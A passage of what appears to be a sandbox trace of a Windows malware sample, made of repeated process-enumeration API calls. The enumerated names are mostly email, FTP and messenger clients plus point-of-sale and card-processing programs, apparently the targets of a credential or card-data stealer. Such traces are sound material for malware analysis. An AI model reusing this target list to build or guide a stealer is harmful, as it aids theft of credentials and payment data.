cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0252.694] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0252.696] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0252.698] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0252.703] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0252.706] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0252.709] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0252.712] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0252.714] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0252.719] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0252.722] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0252.723] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0252.725] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0252.727] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0252.729] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0252.730] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0252.781] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0252.783] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0252.785] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0252.787] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0252.789] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0252.791] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0252.794] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0252.798] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0252.799] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0252.801] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0252.803] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0252.805] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0252.806] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0252.808] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0252.813] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0252.814] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0252.816] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0252.817] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0252.819] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0252.821] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0252.822] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0252.824] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0252.854] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0252.857] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0252.859] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0252.861] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0252.863] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0252.864] CloseHandle (hObject=0x17b0) returned 1 [0252.864] Sleep (dwMilliseconds=0x64) [0253.018] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0253.033] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.035] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0253.037] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0253.038] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.040] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0253.042] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.050] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0253.053] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0253.057] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0253.155] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.157] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.158] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0253.160] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.161] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.163] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.164] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.166] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.168] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.173] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.174] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0253.176] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0253.177] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0253.179] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.180] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.182] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0253.186] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0253.188] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0253.189] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.191] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0253.192] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0253.194] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0253.195] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0253.197] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0253.198] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0253.708] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0253.711] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0253.713] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0253.715] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0253.717] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0253.718] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0253.720] Process32Next 